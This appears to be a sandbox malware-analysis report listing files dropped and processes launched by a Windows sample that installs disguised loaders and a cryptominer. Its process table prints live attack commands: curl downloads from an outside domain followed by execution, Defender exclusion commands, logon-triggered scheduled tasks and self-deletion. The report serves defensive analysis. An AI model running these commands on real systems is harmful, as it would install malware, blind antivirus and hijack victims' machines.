Files
File Path
|
Type
|
Category
|
Malicious
|
|
---|---|---|---|---|
file.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
initial sample
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\loader_5879465914[1].exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
PE32 executable (GUI) Intel 80386, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe:Zone.Identifier
|
ASCII text, with CRLF line terminators
|
modified
|
||
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
|
PE32+ executable (GUI) x86-64, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\miner2.0.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
modified
|
||
C:\Users\user\AppData\Local\Temp\svchost64.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Windows\System32\Microsoft\Libs\WR64.sys
|
PE32+ executable (native) x86-64, for MS Windows
|
dropped
|
||
C:\Windows\System32\Microsoft\Libs\sihost64.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Windows\System32\services64.exe
|
PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\miner2.0.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\services64.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\sihost64.exe.log
|
CSV text
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\svchost64.exe.log
|
ASCII text, with CRLF line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
|
data
|
modified
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_02hfu414.g3e.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0jx2i0vc.koj.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1lquwdk3.nnf.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1sw33nuf.jy0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2gsrsrja.otm.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2um1ksua.x0s.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2xny5hdv.suy.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_31duozca.a5x.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_32diwoqo.zw0.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_41hzin4b.qnl.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4gidlnea.ioj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4qg3ylqg.thb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_52ry0z4r.krq.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5lvba4oa.lzy.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bcp1dl5w.ic2.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_brubbskd.pmu.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_bts5qy3n.dum.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cq2y13qs.05z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_filg3bsn.kem.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fxvreusi.1sl.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_gvskkmcc.jaj.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hpmlhrna.tyu.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_i02hwxoy.f3q.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_jkkpn3xr.jvc.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kiblwhx0.4lb.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_le3d3htk.z3y.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mbnsteeo.d1v.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mmogvf2g.cnm.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nc0uracz.ybw.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_nwzt31qj.w0n.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_obwtrypu.yot.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_olgk2ovd.h1z.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pg1w0tfz.adz.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pnasfq31.j1w.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_regrbua4.eyv.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_rojvywag.cf5.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sogqcheu.p1k.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_sqrvq2m1.2c2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tkkejrq4.la2.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tw5xsb3k.02t.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vokszajx.bpx.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wennl4vp.ldk.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wfnmin1d.o05.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wsmpyfit.gke.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wvbc1o0h.dar.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_xizpgnqk.kfe.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_y5qqkr2y.gq5.ps1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_zhyndefk.d02.psm1
|
ASCII text, with no line terminators
|
dropped
|
||
C:\Users\user\AppData\Local\Temp\conf.vbs
|
ASCII text
|
modified
|
||
C:\Windows\Tasks\axplong.job
|
data
|
dropped
|
||
\Device\ConDrv
|
ASCII text, with CR, LF line terminators
|
dropped
|
||
\Device\Null
|
ASCII text, with CRLF line terminators
|
dropped
|
There are 58 hidden files, click here to show them.
Processes
Path
|
Cmdline
|
Malicious
|
|
---|---|---|---|
C:\Users\user\Desktop\file.exe
|
"C:\Users\user\Desktop\file.exe"
|
||
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
|
||
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
||
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
|
||
C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe
|
"C:\Users\user\AppData\Local\Temp\1000359001\loader_5879465914.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del conf.vbs 2>nul && curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
&& cscript conf.vbs
|
||
C:\Windows\System32\cscript.exe
|
cscript conf.vbs
|
||
C:\Windows\System32\schtasks.exe
|
"C:\Windows\System32\schtasks.exe" /create /tn "Microsoft Edge" /tr "C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe"
/sc onlogon /rl highest /f
|
||
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
|
C:\Users\user\AppData\Local\Temp\Microsoft-Edge.exe
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c cd /d %temp% && del miner2.0.exe 2>nul && curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
&& start miner2.0.exe
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Users\user\AppData\Local\Temp\miner2.0.exe
|
miner2.0.exe
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath
'%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath
'%SystemRoot%' & exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
|
||
C:\Users\user\AppData\Local\Temp\svchost64.exe
|
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Users\user\AppData\Local\Temp\miner2.0.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
& exit
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
|
||
C:\Windows\System32\services64.exe
|
C:\Windows\system32\services64.exe
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath
'%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath
'%SystemRoot%' & exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\services64.exe
|
"C:\Windows\system32\services64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath
'%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath
'%SystemRoot%' & exit
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
|
||
C:\Users\user\AppData\Local\Temp\svchost64.exe
|
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
& exit
|
||
C:\Windows\System32\Microsoft\Libs\sihost64.exe
|
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
|
||
C:\Users\user\AppData\Local\Temp\svchost64.exe
|
C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
& exit
|
||
C:\Windows\System32\Microsoft\Libs\sihost64.exe
|
"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\schtasks.exe
|
schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
|
powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\cmd.exe
|
"C:\Windows\System32\cmd.exe" /c
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl -o conf.vbs https://eijfrhegrtbrfcd.online/download/conf1.php
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\curl.exe
|
curl -o miner2.0.exe https://eijfrhegrtbrfcd.online/download/miner2.0.exe
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\choice.exe
|
choice /C Y /N /D Y /T 3
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
C:\Windows\System32\choice.exe
|
choice /C Y /N /D Y /T 3
|
||
C:\Windows\System32\conhost.exe
|
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
|
||
